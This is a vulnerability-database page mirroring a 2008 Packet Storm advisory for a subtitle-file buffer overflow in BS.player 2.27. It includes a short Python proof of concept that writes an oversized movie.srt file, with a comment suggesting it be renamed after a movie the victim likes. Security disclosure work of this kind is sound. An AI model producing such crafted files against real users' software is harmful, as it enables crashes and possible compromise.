Lucene search

K

bsplayer-overflow.txt

๐Ÿ—“๏ธย 16 Apr 2008ย 00:00:00Reported byย j0rganTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 20ย Views

BS.player 2.27 Build 959 SRT Buffer Overflow vulnerability discovered by j0rgan

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`#!/usr/bin/python  
#  
# BS.player 2.27 Build 959 SRT Buffer Overflow  
# Just rename movie.srt file with the name of the movie you like...  
#  
# Vulnerability discovered by Muris Kurgas a.k.a j0rgan  
# jorganwd [at] gmail [dot] com  
# http://www.jorgan.users.cg.yu  
#  
# bolexxx, learn something, ladies will come soon or l8r man!  
# red pill rocks!  
# no muts, no pain :)  
  
import os  
  
bafer = 'A' * 80000  
fileHandle = open ( 'movie.srt', 'w' )  
fileHandle.write ( '1\n00:00:01,001 --> 00:00:05,099\n'+bafer )  
fileHandle.close()  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
16 Apr 2008 00:00Current
7.4High risk
Vulners AI Score7.4
20
.json
Report